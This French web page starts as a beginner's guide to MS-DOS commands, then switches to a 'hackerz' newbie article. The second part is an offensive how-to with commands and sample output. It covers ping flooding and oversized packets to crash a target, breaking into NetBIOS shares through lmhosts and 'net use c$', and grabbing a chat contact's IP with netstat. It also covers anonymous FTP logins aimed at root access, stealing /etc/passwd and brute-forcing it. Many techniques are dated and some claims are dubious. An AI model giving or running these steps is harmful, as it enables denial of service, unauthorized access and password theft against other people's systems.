%@ Language=JavaScript %>
La commande la plus utilisée du
DOS est la commande DIR. Elle permet d'afficher à l'écran la liste des fichiers
d'un disque.
Pour voir une liste de fichier, tapez DIR à la suite de l'indicatif du DOS puis
appuyez sur Entrée.
C:\>DIR
Pour que l'ordinateur fasse une pause pendant le défilement de la liste tapez :
C:\>DIR / P
Pour avoir seulement une liste des noms des fichiers triés en colonne, tapez :
C:\>DIR / W
Pour voir les fichiers d'une disquette, faites suivre DIR par le nom du lecteur
: C:\>DIR A:
Utilisez le joker pour chercher des fichiers précis : Le joker * sert à masquer
un groupe de caractère dans un fichier. Par exemple pour trouver tous les
fichier commençant par n, tapez : DIR N*
La commande à utiliser pour
voir ce que contient un fichier s'appelle TYPE. C:\>TYPE NOMFICH.EXT
Par exemple pour voire le contenu du fichier lisez.moi tapez
C:\>TYPE LISEZ.MOI
Suivi de la touche Entrée.
Pour faire une pause entre chaque écran, tapez :
C:\>TYPE LISEZ.MOI | MORE
(la barre verticale s'obtient par la combinaison [ALT]+[6].
Pour passer à un autre
répertoire du disque, il faut utiliser la commande CD suivie du nom du
répertoire.
C:\>CD WINDOWS
Pour passer dans la racine du disque, tapez
C:\>CD \
Pour revenir au répertoire précédent, tapez CD..
C:\>CD..
Pour rappeler la dernière commande tapée, appuyez sur la touche F3
La commande COPY sert à copier
un fichier
Elle s'utilise de cette façon :
C:\>COPY source destination
Par exemple pour copier le fichier autoexec.bat dans le répertoire WINDOWS,
tapez :
C:\>COPY AUTOEXEC.BAT C:\WINDOWS
On peut se servir du joker pour copier plusieurs fichiers en même temps.
Voir La commande DIR.
Pour supprimer un fichier, il
faut utiliser la commande DEL
C:\>DEL source
Par exemple pour supprimer tous les fichiers commençant par un A, tapez :
C:\>DEL A*
Faites attention à ne pas supprimer n'importe quels fichiers!
La commande REN du Dos vous
permet de renommer un fichier. Le contenu et la position du fichier sur le
disque ne change pas : seul son nom change.
Pour renommer le fichier AAAAA.doc en BBBBB.doc, il faut taper :
C:\>REN AAAA.doc BBBB.doc
Il faut mettre le nom actuel, suivi d'un espace et du nom futur.
Si le fichier ne se trouve pas dans le répertoire courant, il suffit de taper
son chemin d'accès.
Par exemple si le fichier AAAA.doc se situe dans le répertoire C:\WORD, il faut
tapez :
C:\>REN C:\WORD\AAAA.doc BBBB.doc
Vous pouvez utiliser le Joker pour renommer plusieurs fichiers en même temps.
(Cf La commande DIR)
Pour formater un disquette, il
faut utiliser la commande FORMAT
Pour formater le disque A: tapez :
C:\>FORMAT A:
Pour effectuer un formatage rapide tapez :
C:\>FORMAT A:/Q
Pour faire une disquette système, tapez :
C:\>FORMAT A:/S
Vous pouvez combiner les deux: si vous voulez créer une disquette système
rapidement, tapez :
C:\>FORMAT A: /Q /S
La commande DISKCOPY permet de
dupliquer des disquettes. Vous ne pouvez pas utiliser DISKCOPY pour dupliquer
deux disque de capacité différentes.
Vous ne pouvez pas utiliser DISKCOPY avec un disque dur.
Il suffit de taper ( si vous lecteur de disquette est A) :
C:\>DISKCOPY A: A:
Après avoir chargé la première disquette, l'ordinateur vous demande d'inserer la
disquette destination.
Pour éditer un fichier quelconque, utilisez la commande EDIT.
Pour cela tapez :
C:\>EDIT chemin\nomdufichier
Vous obtiendrez alors l'éditeur du Dos :
Pour éditer le fichier AAAA.doc du répertoire C:\WORD,
tapez :
C:\>EDIT C:\WORD\AAAA.doc
CD
: Cette commande permet de changer de répertoires.
CLS : Cette commande très utiles
efface l'écran, en retirant tous les messages encombrants.
COPY : Cette commande permet de
copier un fichier.
DEL : Cette commande permet de
supprimer des fichiers.
DIR : Cette commande affiche la
liste des fichiers et des répertoires présent sur le disque.
DISKCOPY : Cette commande crée
une copie exacte d'une disquette
FORMAT : Cette commande permet
de formater des disques.
MD : Cette commande permet de
créer des répertoires.
REN : Cette commande permet de
renommer un fichier.
TIME : Cette commande affiche la
date et l'heure et vous permet de les modifier.
TYPE : Cette commande affiche le
contenu d'un fichier à l'écran.
N'utilisez jamais les commandes
du DOS suivantes :
CTTY : Cette commande déconnecte
le DOS du clavier et de l'écran.
DEBUG : Il s'agit d'un
utilitaire permettant de créer des programmes et de modifier la mémoire. Une
mauvaise utilisation peut entraîner le chamboulement de votre disque dur.
FDISK : Cette commande permet de
créer des partitions . Mal utilisée, cette commande peut détruire toutes les
informations de votre disque dur.
FORMAT C: : Cette commande
formate votre disque dur, ne l'utilisez pas à moins d'être sur de ce que vous
faites.
RECOVER : Contrairement à ce
qu'on pourrait croire, cette commande n'est pas un sauveteur. Cette commande
détruit tous les fichiers et tous les répertoires de votre disque, et cela, sans
de demande de confirmation.
==============================================================================================
Et oui même de simples commandes DOS peuvent se révéler utiles aux hackerz !
Attention tout piratage ou intrusion quelconque dans un système est puni par la loi
Le DOS est une mine d'or pour les djeunz hackerZ… voilà enfin un article pour
les newbies de chez newbies :)
Voici les principales commandes utiles aux attaques par DOS (à ne pas confondre
avec l'attaque DoS : DenialofService qui est un plantage de l'OS distant) avec
exemples et schémas à l'appui :
Le Ping :
Nom de la commande : ping
·
Le ping sert à convertir le nom d'hôte ou l'url d'un site en ip, à obtenir des
infos sur un serveur
désiré (souvent voire toujours utile et indispensable avant un test de
vulnérabilité) et à tester le temps de réponse d'un serveur.
Exemple : C:WINDOWS>ping www.securent-2000.com
Envoi d'une requête 'ping' sur www.securent-2000.com [217.174.192.67] avec 32 octets de données :
Réponse de 217.174.192.67
: octets=32 temps=142 ms TTL=240
Réponse de 217.174.192.67 : octets=32
temps=141 ms TTL=240
Réponse de 217.174.192.67 : octets=32
temps=139 ms TTL=240
Réponse de 217.174.192.67 : octets=32
temps=144 ms TTL=240
Statistiques Ping pour
217.174.192.67 :
Paquets : envoyés = 4, reçus = 4,
perdus = 0 (perte 0%),
Durée approximative des boucles en
milli - secondes :
minimum = 139ms, maximum = 144ms,
moyenne = 141ms
·
La commande 'ping' a une autre fonction : le ping overflood (ou flood ping).
Cette fonction du ping
sert à rebooter une machine distante.
La commande à entrer est : ping -n
nbr_de_packets ip.de.la.cible
Exemple : C:WINDOWS>ping -n 65000 172.190.176.24 // j'ai mis 65000 mais faut en mettre suffisamment pour faire rebooter la machine attaquante (ou la votre ! car il est strictement interdit de faire justice sois même ;)
Envoi d'une requête 'ping'
172.190.176.24 avec 32 octets de données
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
[…]
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32
temps<10ms TTL=128 //J'ai raccourci de quelques milliers de lignes…
Statistiques Ping pour
172.190.176.24 :
Paquets : envoyés = 45631, reçus =
12563, perdus = 33098 […]
Pour arrêter le flood faites Ctrl+C
·
Et dernière fonction utile pour nous : l'oversize packet.
La commande à entrer est : ping -l
taille dans taille rentrer la taille du paquet à envoyer
comprise entre 0 et 65000 (la plus grosse possible bien sur ;)
Exemple : C:WINDOWS>ping -l 64510 www.lesite.com
Heureusement, presque tous les serveurs sont protégés et vous recevrez une message de timeout comme quoi le délai d'attente autorisé est dépassé…
Net view :
Nom de commande : net view nom_d'ordi
La commande net view sert à voir les ressources partagées d'un ordi avant une
attaque NetBIOS (voir plus loin)
Exemple : C:WINDOWS>net view G4S9F2
Net use :
Nom de commande : net use om_d'ordilettre_de_partition
La commande net use sert à se connecter au répertoire d'une ressource partagé
sans pass. Son utilité la plus fréquente est dans les attaques NetBIOS pour se
connecter au répertoire windows en mettant c$ à la place de la lettre de la
partition (voir plus loin).
Exemple : C:WINDOWS>net use G4S9F2d
Le statistic NetBIOS over TCP/IP
:
Nom de commande : nbtstat
L'attaque par NetBios est une intrusion en règle qui sert à rentrer dans un ordi
qui a des fichiers partagés (c'est un exploit NetBIOS quoi).
La commande à entrer est : nbtstat -A ip.du.pigeon
Exemple : C:WINDOWS>nbtstat -A 172.188.66.214
NetBIOS Remote Machine Name Table
Name |
Type |
Status |
G4S9F WORKGROUP G4S9F2
|
<20> <00> <03>
|
UNIQUE Registred GROUP Registred UNIQUE Registred
|
MAC Adress = 44 - 45 - 53 - 54 - 00 - 00
La ligne " G4S9F2 <20> UNIQUE Registered" nous intéresse car elle possède le nom d'ordi (G4S9F2) et la valeur <20> qui veut dire que l'hôte possède des fichiers partagés et donc que l'attaque va être possible.
Il faut maintenant modifier le DOS en entrant la ligne edit lmhost pour entrer dans l'éditeur de DOS puis taper les commandes :
Ip.de.la.cible nom_de_l'ordi #PRE
Donc pour l'exemple de mon ordi :
172.188.66.214 G4S9F2 #PRE
Faites Fichier>Enregistrer puis Fichiers>Quitter pour revenir au DOS.
Tapez ensuite la commande : nbtstat
-R
Vous obtenez alors : Successfull
purge and preload of the NBT Remote Cache Name Table puis
l'inventaire des ressources partagées (a,c,d…).
Entrez alors la commande : net view
om_d'ordi
Donc pour notre exemple :C:WINDOWS>net view G4S9F2
Vous obtenez alors l'inventaire des ressources partagées (a,c,d,e…)
Entrez ensuite : net use om_d'ordiX
X étant la lettre de partition à laquelle on veut accéder
Puis pour accéder au répertoire windows (qui donnera donc accès au disque dur
distant), remplacez le X par c$
Ca y est j'ai pris le contrôle de mon ordi :)
Les
connexions actives :
Nom de commande : netstat -n
La commande Netstat sert à voir toutes connexions actives vers votre ordi sous
la forme :
Proto Adresse locale Adresse distante Etat
Mais l'utilité pour nous va donc être de trouver une ip sur icq. Ben ouais le
mec avec qui vous parlez est en connexion active avec l'icq de votre ordi.
Pour choper l'ip de votre pote sur icq faut d'abord qu'il soit connecté à icq
(logique). Bon quand vous voyez votre pote connecté à icq, éteignez votre icq et
entrez (dans le DOS) la commande :
netstat -n puis rallumez 1 min après votre icq et envoyez un
message à votre pote. Ensuite y a plus qu'à refaire
netstat -n et une ip à du
apparaître avec un port du genre 5190 ou 5191 (y en a plein mais c'est les plus
courants). Son ip apparaîtra dans la partie Adresse distante sous la forme
172.183.68.46 : 5190 (décidément ces zaoliens y sont partout). Cette méthode ne
marche plus depuis un bout de temps mais c'est une techniques qui était
utilisée, donc à voir.
Le protocole FTP :
Nom de commande utile : ftp -n et plein d'autres.
Voyons comment hacker par FTP. Mais ne vous faites pas d'illusions cette
technique ne marche à peu près que sur 1 serveur sur 100 000 (et encore). Mais
qui sait peut être que si vous avez déjà gagné au loto… vous trouverez un
serveur non sécurisé. De toute façon nous c'est la technique qu'on veut c'est
pas les pratiques illégales qu'on peut faire avec :)
Pour hacker un site par FTP, nous allons ouvrir l'url concerné, puis passer le
login… sans login, puis passer le pass… sans pass.
Exemple :C:WINDOWS>ftp -n
ftp> open www.securent-2000.com //arf…
de toute façon ça marche pas
Connecté à www.securent-2000.com.
220 www.securent-2000.com FTP server
ready.
ftp> quote user ftp //entrer quote
user ftp
331 Guest login ok, send your
complete e-mail address as password.
ftp> quote cwd ~root //entrer quote
cwd ~root
530 Please login with user and pass.
ftp> quote pass ftp //entrer quote
pass ftp
230 Guest login ok, access
restriction apply
ftp>
Le problème c'est que vous serez loggé sur le site mais pas en tant que root donc vous n'aurez pas toutes les possibilités. Pour être loggé en tant que root remplacez au début : ftp> open www.securent-2000.com par ftp> open " ;open www.securent-2000.com" mais la faut plus de chance qu'au loto !
Bon maintenant que vous êtes loggé sur le site (en tant que root ou non) voyons les commandes ftp qui vont nous permettre de modifier le site.
kdir : créer un répertoire
rmdir : supprimer un répertoire
pwd : se repérer sur le disque
cd : aller dans un répertoire
dir : voir le contenue de la racine ou du répertoire ou l'on se trouve. Pour
différencier un fichier d'un répertoire, regardez le premier caractère qui est
soir une lettre (répertoire) soir [-] (fichier).
cd / : revenir à la racine du répertoire
cd .. : revenir au répertoire précédent
del : supprimer un fichier
get : prendre un fichier pour le mettre sur le bureau
put : mettre un fichier de votre bureau sur le serveur
ascii : passe la connexion en mode ascii
binary : passe la connexion en mode binaire
system : trouver la version du daemon et le type d'OS sous lequel tourne le
serveur
open : établir une connexion avec un serveur distant
quit : se déconnecter du serveur distant
Entrez les commandes comme ça : ftp>get pass.txt //c'est seulement un exemple !
Cherchons maintenant le pass du root pour obtenir tous les pouvoirs (sauf si vous avez déjà gagné 3 ou 4 fois le pactole). Le fichier contenant les pass se nomme généralement " passwd " et se situe dans le rép /etc/passwd. S'il n'y est pas cherchez mais il est toujours facilement accessible. Quand vous avez obtenue le fichier de pass il suffit de le décrypter avec un brute force mais si il est shadow y a plus qu'a vérifier l'OS utilisé par le serveur pour utiliser le bon password cracker.
oceanic64